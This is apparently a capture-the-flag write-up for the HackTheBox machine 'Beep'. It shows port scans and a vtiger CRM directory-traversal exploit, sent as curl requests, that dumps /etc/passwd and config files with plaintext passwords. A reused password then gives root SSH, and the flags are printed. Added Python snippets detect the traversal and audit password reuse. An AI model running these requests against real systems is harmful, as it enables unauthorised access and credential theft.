Nmap TCP results

Nmap scan report for 10.10.10.7
Host is up, received user-set (0.13s latency).
Scanned at 2020-07-16 17:03:26 CEST for 720s
Not shown: 988 closed ports
Reason: 988 resets
PORT      STATE SERVICE    REASON         VERSION
22/tcp    open  ssh        syn-ack ttl 63 OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|   2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4SXumrUtyO/pcRLwmvnF25NG/ozHsxSVNRmTwEf7AYubgpAo4aUuvhZXg5iymwTcZd6vm46Y+TX39NQV/yT6ilAEtLbrj1PLjJl+UTS8HDIKl6QgIb1b3vuEjbVjDj1LTq0Puzx52Es0/86WJNRVwh4c9vN8MtYteMb/dE2Azk0SQMtpBP+4Lul4kQrNwl/qjg+lQ7XE+NU7Va22dpEjLv/TjHAKImQu2EqPsC99sePp8PP5LdNbda6KHsSrZXnK9hqpxnwattPHT19D94NHVmMHfea9gXN3NCI3NVfDHQsxhqVtR/LiZzpbKHldFU0lfZYH1aTdBfxvMLrVhasZcw==
25/tcp    open  smtp       syn-ack ttl 63 Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       syn-ack ttl 63 Apache httpd 2.2.3
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       syn-ack ttl 63 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: PIPELINING STLS EXPIRE(NEVER) IMPLEMENTATION(Cyrus POP3 server v2) UIDL TOP AUTH-RESP-CODE USER LOGIN-DELAY(0) RESP-CODES APOP
111/tcp   open  rpcbind    syn-ack ttl 63 2 (RPC #100000)
143/tcp   open  imap       syn-ack ttl 63 Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: NAMESPACE RIGHTS=kxte OK IMAP4 NO Completed URLAUTHA0001 ATOMIC BINARY X-NETSCAPE STARTTLS LISTEXT IDLE CONDSTORE THREAD=ORDEREDSUBJECT IMAP4rev1 THREAD=REFERENCES QUOTA ANNOTATEMORE CATENATE UIDPLUS SORT=MODSEQ SORT MAILBOX-REFERRALS ACL MULTIAPPEND LITERAL+ UNSELECT RENAME LIST-SUBSCRIBED ID CHILDREN
443/tcp   open  ssl/https? syn-ack ttl 63
|_ssl-date: 2020-07-16T15:15:23+00:00; +2m32s from scanner time.
993/tcp   open  ssl/imap   syn-ack ttl 63 Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       syn-ack ttl 63 Cyrus pop3d
3306/tcp  open  mysql      syn-ack ttl 63 MySQL (Too many connections)
4445/tcp  open  upnotifyp? syn-ack ttl 63
10000/tcp open  http       syn-ack ttl 63 MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 2m31s

The HTTPS service uses very old protocols, like SSLv3 and TLS 1.0. To let tools that otherwise report an SSL error talk to it, we have to lower the minimum protocol and the security level in the OpenSSL configuration:

sed -i 's,^\(MinProtocol[ ]*=\).*,\1TLSv1.0,g' /etc/ssl/openssl.cnf
sed -i 's,^\(CipherString[ ]*=\).*,\1DEFAULT@SECLEVEL=1,g' /etc/ssl/openssl.cnf

Directory/Files on the 443 vhost

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 20469

Error Log: /opt/dirsearch/logs/errors-20-07-17_12-23-26.log

Target: https://10.10.10.7/

[12:23:27] Starting: 
[12:26:34] 301 -  309B  - /admin  ->  https://10.10.10.7/admin/
[12:31:36] 301 -  311B  - /configs  ->  https://10.10.10.7/configs/
[12:34:59] 200 -  894B  - /favicon.ico
[12:37:02] 301 -  308B  - /help  ->  https://10.10.10.7/help/
[12:37:48] 301 -  310B  - /images  ->  https://10.10.10.7/images/
[12:39:34] 301 -  308B  - /lang  ->  https://10.10.10.7/lang/
[12:39:51] 301 -  308B  - /libs  ->  https://10.10.10.7/libs/
[12:40:30] 301 -  308B  - /mail  ->  https://10.10.10.7/mail/
[12:41:33] 301 -  311B  - /modules  ->  https://10.10.10.7/modules/
[12:43:38] 301 -  309B  - /panel  ->  https://10.10.10.7/panel/
[12:46:02] 301 -  314B  - /recordings  ->  https://10.10.10.7/recordings/
[12:46:41] 200 -   28B  - /robots.txt
[12:49:01] 301 -  310B  - /static  ->  https://10.10.10.7/static/
[12:50:16] 301 -  310B  - /themes  ->  https://10.10.10.7/themes/
[12:51:33] 301 -  307B  - /var  ->  https://10.10.10.7/var/
[12:52:00] 301 -  313B  - /vtigercrm  ->  https://10.10.10.7/vtigercrm/

The VM is running the following software/services:

OpenSSH 4.3 
Postfix ?
Apache 2.2.3
Cyrus pop3d 2.3.7
NFS ?
Cyrus imapd 2.3.7
MySQL ?
Asterisk Call Manager 1.1
MiniServ 1.570 (Webmin httpd)
FreePBX 2.8.1.4 and/or 2.5 ?
vtiger CRM 5.1.0

The vtiger CRM installation is vulnerable to directory traversal in sortfieldsjson.php (CVE-2012-4867, https://www.cvedetails.com/cve/CVE-2012-4867/); the trailing %00 in the module_name parameter truncates whatever the script appends to the path:

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  curl -k "https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00" 
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash

Knowing that the flag is usually in the user's home, it is quite obvious that you can use the vulnerability to read user.txt directly (and it works), but I prefer to try to get into the machine.
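As an added example (not code from the writeup or from vtiger), the two defender-side pieces this traversal calls for: a check over web access log lines that flags a module_name carrying ".." or a NUL byte, and a hardened lookup that only accepts a plain identifier and verifies the resolved file stays under the module directory. The log lines are constructed, and the ".json" suffix and base directory are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access log lines (not real traffic from the box);
# the first one carries the same traversal URL the writeup uses.
SAMPLE_LOG = """\
10.10.16.106 - - [16/Jul/2020:17:10:01 +0200] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1432
10.10.16.106 - - [16/Jul/2020:17:10:05 +0200] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=Contacts HTTP/1.1" 200 512
10.10.16.106 - - [16/Jul/2020:17:10:09 +0200] "GET /vtigercrm/index.php?module=Leads&action=index HTTP/1.1" 200 8812
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def traversal_attempts(log_text):
    """Return (path, decoded module_name) for every request whose module_name
    parameter contains a '..' segment or a NUL byte once URL-decoded."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qs already percent-decodes, so %00 becomes a real NUL byte
        for value in parse_qs(url.query, keep_blank_values=True).get("module_name", []):
            if ".." in value or "\x00" in value:
                hits.append((url.path, value))
    return hits


def safe_module_path(base_dir, module_name):
    """Hardened lookup: only a plain identifier is accepted (no NUL bytes, no
    separators) and the resolved file must stay below base_dir. The '.json'
    suffix is an assumption for this example, not vtiger's real layout.
    Returns the resolved path, or None when the name is rejected."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", module_name):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, module_name + ".json"))
    # realpath follows symlinks, so this also catches a link that escapes base
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate
```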

We can search for information that helps us get into the system. Looking at the Asterisk configuration files, we found:

 lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  curl -k "https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/cdr_mysql.conf%00" 
; 
; Note - if the database server is hosted on the same machine as the 
; asterisk server, you can achieve a local Unix socket connection by 
; setting hostname = localhost
; 
; port and sock are both optional parameters.  If hostname is specified 
; and is not "localhost", then cdr_mysql will attempt to connect to the 
; port specified or use the default port.  If hostname is not specified 
; or if hostname is "localhost", then cdr_mysql will attempt to connect 
; to the socket file specified by sock or otherwise use the default socket 
; file. 
; 
[global] 
hostname = localhost
dbname=asteriskcdrdb 
password = jEhdIekWmdjE
user = asteriskuser
userfield=1
;port=3306 
;sock=/tmp/mysql.sock

Unfortunately, it is not possible to connect directly to the database because of an IP filter. Proceeding with the exploration, you will find other credentials for other services:

 lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  curl -k "https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/voicemail.conf%00" 
[general]
#include vm_general.inc
#include vm_email.inc
[default]

233 => ,Fanis Papafanopoulos,,,attach=no|saycid=no|envelope=no|delete=no
 lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  curl -k "https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/sip_additional.conf%00" 
;--------------------------------------------------------------------------------;
; Do NOT edit this file as it is auto-generated by FreePBX. All modifications to ;
; this file must be done via the web gui. There are alternative files to make    ;
; custom modifications, details at: http://freepbx.org/configuration_files       ;
;--------------------------------------------------------------------------------;
;

[233]
deny=0.0.0.0/0.0.0.0
secret=fji#REH9i##nrIIOnjndwP923UEj
dtmfmode=rfc2833
canreinvite=no
context=from-internal
host=dynamic
type=friend
nat=yes
port=5060
qualify=yes
callgroup=
pickupgroup=
dial=SIP/233
mailbox=233@default
permit=0.0.0.0/0.0.0.0
callerid=device <233>
callcounter=yes
faxdetect=no

Finally, the password to access the Elastix administration interface (as admin) is found in amportal.conf:

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  curl -k --silent "https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00" | grep -v "^#"|grep .
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin
AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin 
FOPWEBROOT=/var/www/html/panel
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
AUTHTYPE=database
AMPADMINLOGO=logo.png
AMPEXTENSIONS=extensions
ENABLECW=no
ZAP2DAHDICOMPAT=true
MOHDIR=mohmp3
AMPMODULEXML=http://mirror.freepbx.org/
AMPMODULESVN=http://mirror.freepbx.org/modules/
AMPDBNAME=asterisk
ASTETCDIR=/etc/asterisk
ASTMODDIR=/usr/lib/asterisk/modules
ASTVARLIBDIR=/var/lib/asterisk
ASTAGIDIR=/var/lib/asterisk/agi-bin
ASTSPOOLDIR=/var/spool/asterisk
ASTRUNDIR=/var/run/asterisk
ASTLOGDIR=/var/log/asterisk


With the same password it is possible to access the FreePBX (FreePBX 2.8.1.4) interface as admin


And the recording list (FreePBX 2.5)


Now, there is a menu item "Java SSH"; clicking on it does not open an SSH shell, but this phrase led me to think that the admin password might also work as the root SSH password


and it works!

 lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/beep  ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7
root@10.10.10.7's password: 
Last login: Sat Jul 18 00:53:04 2020 from 10.10.16.106

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# cat /home/fanis/user.txt 
aeff3def0c765c2677b94715cffa73ac
[root@beep ~]# cat root.txt 
d88e006123842106982acce0aaf453f0
[root@beep ~]# 
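The root of this box is one password reused across the CDR database, the manager interface, FOP, ARI, the web UIs and finally root's SSH login. As an added example (not part of the writeup), a small audit that walks the same kind of config files read above and groups every password-like setting by its value, so reuse across services stands out. File contents are constructed excerpts with a placeholder password; the file names follow the ones shown on the page.

```python
import re
from collections import defaultdict

# Constructed excerpts in the formats seen above (KEY=VALUE and Asterisk-style
# ini); "SharedPass123" is a placeholder, not the box's real password.
SAMPLE_FILES = {
    "/etc/amportal.conf": """\
AMPDBUSER=asteriskuser
AMPDBPASS=SharedPass123
AMPMGRUSER=admin
AMPMGRPASS=SharedPass123
FOPPASSWORD=SharedPass123
ARI_ADMIN_PASSWORD=SharedPass123
AUTHTYPE=database
""",
    "/etc/asterisk/cdr_mysql.conf": """\
; database settings for CDR logging
[global]
hostname = localhost
password = SharedPass123
user = asteriskuser
""",
    "/etc/asterisk/sip_additional.conf": """\
[233]
secret=Ext233Only!
host=dynamic
""",
}

# Matches keys that contain pass/password/secret, in either "K=V" or "K = V" form
SECRET_KEY_RE = re.compile(
    r"^\s*([A-Za-z0-9_]*(?:pass|password|secret)[A-Za-z0-9_]*)\s*=\s*(.+?)\s*$", re.I)


def collect_secrets(files):
    """Map each secret value to the (file, key) pairs that carry it."""
    uses = defaultdict(list)
    for path, text in files.items():
        for line in text.splitlines():
            if line.lstrip().startswith((";", "#")):  # skip comments
                continue
            m = SECRET_KEY_RE.match(line)
            if m:
                uses[m.group(2)].append((path, m.group(1)))
    return uses


def reused_secrets(files, min_uses=2):
    """Return [(value, [(file, key), ...])] for values used by at least
    min_uses settings, most widely reused first."""
    uses = collect_secrets(files)
    return sorted(((v, u) for v, u in uses.items() if len(u) >= min_uses),
                  key=lambda item: -len(item[1]))
```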

- lilloX


